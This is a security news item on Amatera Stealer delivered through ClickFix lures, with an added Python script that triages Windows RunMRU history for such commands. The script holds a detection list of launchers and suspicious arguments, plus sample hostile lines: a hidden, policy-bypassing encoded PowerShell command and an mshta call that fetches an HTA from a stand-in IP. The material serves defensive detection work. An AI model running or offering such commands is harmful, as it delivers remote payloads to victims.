Amatera Stealer, a more sophisticated information stealer built on ACR Stealer, was deployed between April and May through ClearFake web injection campaigns that combined EtherHiding (malicious code retrieved from a Binance Smart Chain contract) with ClickFix social engineering, according to GBHackers News.
Threat actors lured targets into pasting and executing malicious commands in the Windows Run dialog, which led to the deployment of Amatera Stealer, a report from Proofpoint showed. Beyond using NTSockets for command-and-control communications and WoW64 SysCalls to invoke Windows APIs, Amatera Stealer hides its theft of browser, cryptocurrency wallet, messaging app, and email client data behind hardcoded IP addresses rather than domain names. Its C2 configuration also allows it to fetch and run additional payloads, said Proofpoint researchers, who noted that the stealer is also distributed through cracked software and phony downloads. Such findings should prompt not only stronger user training on social engineering techniques but also restrictions on the execution of unauthorized PowerShell scripts, the researchers added.
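Because the ClickFix lure relies on the victim typing a command into the Run dialog, one artefact an incident responder can check is the Run-box history Windows keeps at HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, where each entry is a one-letter value whose data ends in the literal characters "\1" and the MRUList value orders those letters most recent first. The script below, an added example that is not part of the Proofpoint or GBHackers reporting, triages an exported set of RunMRU values for the launcher-plus-argument combinations a ClickFix command typically has (hidden window, encoded command, remote URL, hardcoded IP) and decodes any PowerShell -EncodedCommand payload it finds. The sample values and the 198.51.100.7 address (a documentation range) are constructed for illustration; the indicator list is the author's assumption, not a published Proofpoint rule.

```python
"""Triage Windows Run-dialog history (RunMRU) for ClickFix-style commands.

Windows records what a user types into Win+R under
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU.
Each entry is a single-letter value whose data ends in the literal
characters "\\1"; the MRUList value orders the letters, most recent first.
"""
import base64
import re
from typing import Dict, List, Optional

# Interpreters and LOLBins a ClickFix lure typically launches from the Run box.
LAUNCHERS = re.compile(
    r"\b(powershell|pwsh|mshta|cmd|wscript|cscript|rundll32|regsvr32|certutil|curl|bitsadmin)\b",
    re.IGNORECASE,
)

# Argument patterns that are rare in a legitimate Run-box command (assumed indicator list).
SUSPICIOUS_ARGS = [
    (re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\b", re.I), "encoded command"),
    (re.compile(r"\biex\b|invoke-expression", re.I), "in-memory execution"),
    (re.compile(r"-(w|window(style)?)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(ep|executionpolicy)\s+bypass", re.I), "execution policy bypass"),
    (re.compile(r"https?://", re.I), "remote URL"),
    (re.compile(r"\b\d{1,3}(\.\d{1,3}){3}\b"), "hardcoded IP address"),
]

# Constructed sample export of a RunMRU key (not real telemetry).
# MRUList "cab" means entry c is the most recent, then a, then b.
SAMPLE_RUNMRU: Dict[str, str] = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "powershell -w hidden -ep bypass -enc SQBFAFgA\\1",  # SQBFAFgA = "IEX" in UTF-16LE
    "c": "mshta http://198.51.100.7/verify.hta\\1",
}


def parse_runmru(values: Dict[str, str]) -> List[str]:
    """Return the Run-box commands most-recent-first with the trailing '\\1' stripped."""
    commands = []
    for letter in values.get("MRUList", ""):
        raw = values.get(letter)
        if raw is None:
            continue
        commands.append(raw[:-2] if raw.endswith("\\1") else raw)
    return commands


def decode_encoded_command(command: str) -> Optional[str]:
    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE text)."""
    m = re.search(r"-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", command, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_runmru(values: Dict[str, str]) -> List[dict]:
    """Flag Run-box entries that pair a script launcher with suspicious arguments.

    Each finding records the entry's position (0 = most recent), the launcher,
    the matched indicators and, where present, the decoded -EncodedCommand text.
    """
    findings = []
    for position, command in enumerate(parse_runmru(values)):
        launcher = LAUNCHERS.search(command)
        reasons = [label for pattern, label in SUSPICIOUS_ARGS if pattern.search(command)]
        if launcher and reasons:
            findings.append({
                "position": position,
                "command": command,
                "launcher": launcher.group(1).lower(),
                "reasons": reasons,
                "decoded": decode_encoded_command(command),
            })
    return findings


if __name__ == "__main__":
    for finding in triage_runmru(SAMPLE_RUNMRU):
        print(f"[{finding['position']}] {finding['launcher']}: {', '.join(finding['reasons'])}")
        if finding["decoded"]:
            print(f"    decoded: {finding['decoded']}")
```

On a live host the same values can be exported with `reg export "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" runmru.reg` and fed to `triage_runmru` after parsing; the most recent entry (position 0) is usually the one the lure asked the user to paste. RunMRU is per-user and is only written when the command is launched from the Run dialog, so it complements rather than replaces PowerShell script block logging and process-creation telemetry.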